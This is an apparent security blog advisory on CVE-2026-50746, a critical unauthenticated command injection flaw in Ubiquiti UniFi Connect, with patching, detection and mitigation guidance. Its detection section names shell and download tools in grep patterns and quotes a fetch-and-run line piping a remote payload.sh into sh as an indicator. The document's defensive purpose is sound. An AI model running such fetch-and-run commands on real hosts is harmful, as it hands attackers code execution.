CVE-2026-50746: Critical Command Injection in UniFi Connect
| Field | Value |
|---|---|
| CVE ID | CVE-2026-50746 |
| CVSS score | 10.0 Critical |
| Attack vector | Network |
| Auth required | None |
| Patch status | Fixed in UniFi Connect Application 3.4.20 and later |
TL;DR - CVE-2026-50746 is a CVSS 10.0 flaw in Ubiquiti UniFi Connect Application. - Versions 3.4.16 and earlier should be upgraded to 3.4.20 or later. - No confirmed public exploitation or PoC is known from primary sources, but patch urgently.
What is CVE-2026-50746?
CVE-2026-50746 is a critical vulnerability affecting the Ubiquiti UniFi Connect Application. The NVD describes the issue as an Improper Access Control vulnerability that allows a malicious actor with network access to exploit the application and achieve command injection on the host device. Ubiquiti’s advisory aligns with that characterization and rates the issue as severe enough to warrant immediate remediation.
The CVSS v3.1 base score is 10.0, with vector CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H. For defenders, that combination matters more than the label alone. It means the flaw is remotely reachable over the network, requires no authentication, needs no user interaction, and can lead to high impact across confidentiality, integrity, and availability. Even without confirmed exploitation, this profile should push the issue into urgent patching queues.
Who is affected?
According to Ubiquiti’s Security Advisory Bulletin 066, the affected product is the UniFi Connect Application. The advisory states that versions 3.4.16 and earlier are affected. The remediation guidance is explicit: upgrade to version 3.4.20 or later.
That version range is important because it leaves a gap between the last known vulnerable release and the fixed release. Publicly available source material used here does not explain whether versions 3.4.17, 3.4.18, and 3.4.19 were internal, skipped, unavailable, or partially fixed. Defenders should avoid assumptions and follow the vendor’s wording exactly: if you are on 3.4.16 or earlier, move to 3.4.20 or later. If you are on an intermediate build and cannot verify its status from vendor documentation, treat it as potentially affected until confirmed otherwise.
Why this matters operationally
This is not just another high score on a dashboard. A network-exploitable, unauthenticated command injection issue in a management or application platform can become an initial access path into the broader environment. If the UniFi Connect Application is exposed to untrusted networks, the risk increases sharply because an attacker may not need stolen credentials or phishing to begin exploitation.
The phrase “command injection on the host device” is especially significant. It implies the impact may extend beyond the application itself and into the underlying operating environment hosting UniFi Connect. In practice, defenders should think about service integrity, unauthorized process execution, data exposure, and possible pivoting opportunities from the affected host. If the host has access to internal services, stored credentials, or management interfaces, the downstream risk can exceed the original vulnerable component.
Exploitation status and what defenders should assume
Based on the available primary-source material for this article, there is no confirmed evidence of exploitation in the wild. The CVE is not currently listed in CISA’s Known Exploited Vulnerabilities catalog, which means there is no KEV-backed confirmation of active exploitation at the time of writing.
There is also no confirmed public proof of concept identified from the retrieved primary references. The NVD entry surfaced only the vendor advisory as a reference, and no vendor-linked exploit material was identified in those sources. That said, absence of a public PoC should not be read as low risk. For vulnerabilities with AV:N/PR:N/UI:N and a CVSS 10.0 score, defenders should assume exploit development is feasible and may emerge quickly, especially once reverse engineering of patched versions begins.
Bottom line
CVE-2026-50746 is a critical unauthenticated network-exploitable flaw in Ubiquiti UniFi Connect Application that can lead to command injection on the host device. The vendor states that versions 3.4.16 and earlier are affected, and the fix is to upgrade to 3.4.20 or later.
There is no confirmed public PoC and no confirmed in-the-wild exploitation from the primary sources reviewed here. Defenders should still treat this as an urgent patching event because the vulnerability’s characteristics make it highly attractive for rapid exploitation once more technical detail becomes available.
For further reading, check out our articles on CVE-2023-54352 and best practices for home network segmentation.
This article may contain affiliate links. We earn a commission on qualifying purchases at no extra cost to you.
Immediate response priorities
If you manage UniFi Connect, the first task is straightforward: identify every instance and its version. You need an asset-backed answer, not a best guess. This includes appliances, virtual deployments, or bundled environments where the Connect application may be installed as part of a larger platform. If exposure is uncertain, assume reachable systems are at risk until confirmed otherwise.
Second, prioritize internet-exposed or broadly reachable instances for emergency action. Because the vulnerability is described as network-accessible and unauthenticated, segmentation matters immediately. If you cannot patch on the same day, restrict access to trusted admin networks, disable unnecessary exposure paths, and intensify monitoring on the host and any reverse proxies in front of it.
Detection and investigation
Because the public technical detail is still limited, defenders need to build detection around the known behavior: unexpected requests to the application followed by suspicious command execution on the host. Start by collecting logs from the UniFi Connect host, any web server or reverse proxy in front of it, EDR telemetry, and network perimeter devices that can show inbound requests to the service.
You should also review recent activity for indicators of post-exploitation rather than relying only on signature-style matching. With command injection vulnerabilities, successful exploitation may show up as child processes launched by the application service, shell invocation, outbound connections from the host, or modifications to startup, scheduled task, or persistence locations. If you lack application-specific telemetry, host-level evidence may be your best source of truth.
Technical Notes
Look for suspicious shell execution patterns on the host, especially where a web-facing service spawns command interpreters or common download utilities:
# Linux examples: hunt for suspicious child processes
ps -ef | egrep 'sh -c|bash -c|curl |wget |nc |python -c|perl -e'
# Review recent command execution in auth and syslog locations
grep -R -E 'sh -c|bash -c|curl |wget |nc |python -c|perl -e' /var/log 2>/dev/null
Example log and process patterns worth investigating:
parent_process=unifi-connect
child_process=/bin/sh
command_line=sh -c <unexpected command>
parent_process=java
child_process=/bin/bash
command_line=bash -c curl http://<ip>/payload.sh | sh
If the application is fronted by a reverse proxy or HTTP access logs are available, search for metacharacters often associated with command injection attempts:
grep -R -E '(%3B|;|%7C||%26|&|`|$)' /var/log/nginx /var/log/apache2 2>/dev/null
A simple Splunk-style query for suspicious web requests followed by shell activity might look like:
(index=web OR index=proxy) (";" OR "%3B" OR "|" OR "%7C" OR "$(" OR "%24%28" OR "`")
| stats count by src_ip, dest_ip, uri, http_method
(index=edr OR index=os) (parent_process="unifi-connect" OR parent_process="java")
(child_process="/bin/sh" OR child_process="/bin/bash")
| stats count by host, parent_process, child_process, command_line
If you do not have product-specific log guidance from Ubiquiti yet, assume attackers may try low-noise requests that do not obviously stand out. That means pairing HTTP telemetry with process execution and outbound network monitoring is the safer detection strategy.
Mitigation and patching
The vendor guidance is clear: upgrade UniFi Connect Application to version 3.4.20 or later. That is the only confirmed fix version identified in the vendor advisory and reflected in the research note. If you are running 3.4.16 or earlier, you should schedule emergency patching rather than waiting for broader community reporting.
If you cannot patch immediately, reduce the attack surface aggressively. Restrict network access to the application so only trusted administrative segments can reach it. Remove any direct internet exposure, tighten firewall rules, and if possible place the service behind an access-controlled management network or VPN. These are workarounds, not substitutes for upgrading, because the vulnerability is still present until the fixed version is installed.
Technical Notes
Because deployment methods vary, validate the installed version first using your standard UniFi management workflow or host package inventory. If the application is managed through an appliance UI, use the vendor-supported update process to move to 3.4.20 or later.
For Linux-based hosts, generic upgrade validation steps may include:
# Check what version is installed using package inventory
dpkg -l | grep -i unifi
rpm -qa | grep -i unifi
# If your environment uses containers, inspect running images
docker ps --format 'table {{.Names}} {{.Image}}'
docker images | grep -i unifi
If your deployment supports package-based updates, use your approved repository and change-control process to install the fixed release. Because public source material here does not document a universal CLI installer for UniFi Connect, do not rely on copied commands from unrelated UniFi products. The safe defender action is to use the vendor-supported upgrade path and then verify the resulting version is 3.4.20 or later.
For temporary exposure reduction, apply concrete access controls at the network layer:
# Example: allow only a trusted admin subnet to reach the service
iptables -A INPUT -p tcp -s 10.20.30.0/24 --dport 443 -j ACCEPT
iptables -A INPUT -p tcp --dport 443 -j DROP
Or on a perimeter firewall, restrict the management interface to VPN or jump-host source ranges only. If you do not know the exact service port used in your environment, review listening sockets before changing policy:
ss -tulpn
netstat -tulpn
After patching, confirm there are no lingering signs of compromise. A fixed version stops new exploitation but does not remove persistence, rogue accounts, scheduled jobs, or attacker tooling already placed on the host.
Validation after remediation
After the upgrade, verify two things: first, that the application now reports version 3.4.20 or later; second, that the host shows no suspicious process execution or persistence artifacts from the pre-patch period. This validation step is critical because organizations often patch successfully but skip compromise assessment.
You should also monitor for continued probing against the application. Once a CVE becomes public, opportunistic scanning often follows even if exploit details are sparse. Continued attack traffic after patching may not indicate compromise, but it is useful evidence for hardening decisions such as keeping the service off the public internet permanently.
References
- NVD CVE record: CVE-2026-50746
- Ubiquiti Security Advisory Bulletin 066: Security Advisory Bulletin 066
- CISA Known Exploited Vulnerabilities Catalog: CISA KEV Catalog